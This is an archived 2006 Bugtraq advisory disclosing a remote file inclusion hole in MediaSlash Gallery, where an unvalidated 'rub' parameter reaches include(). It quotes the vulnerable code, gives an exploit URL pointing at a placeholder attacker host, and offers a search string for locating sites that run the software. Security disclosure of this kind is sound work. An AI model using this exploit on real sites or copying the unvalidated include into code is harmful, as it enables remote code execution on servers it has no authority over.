lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: 30 Mar 2006 20:39:12 -0000
From: simo64@...il.com
To: bugtraq@...urityfocus.com
Subject: MediaSlash Gallery 'rub' variable  Remote File inlcusion
 Vulnerability


author: [Moroccan Security Team]
Vendor: www.MediaSlash.com
Vendor Contacted
greetz to : [Moroccan Security Team] CiM-TeaM and All Freinds
Google : Powered by MediaSlash.com
Details:

MediaSlash Galleryis is vulnerable to remote URL inclusion vulnerability
This flaw is due to an input validation error in the "index.php"(line 489)
script that does not validate the "rub" variable,remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
 
Code:
 
27 . 		$rub = @$_GET["rub"];
...
57 .		$page_menu = ''.$rub.'/index.php';
489.		<? include($page_menu); ?> //!!!!!!!!


Exploit http://[trajet]/[path]/index.php?rub=http://[attacker]

http://[attacker]/index.php will be included and executed withe
the privileges of the web server

Simo64 Moroccan Security Team :) simo64[at]gmail[dot]com


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ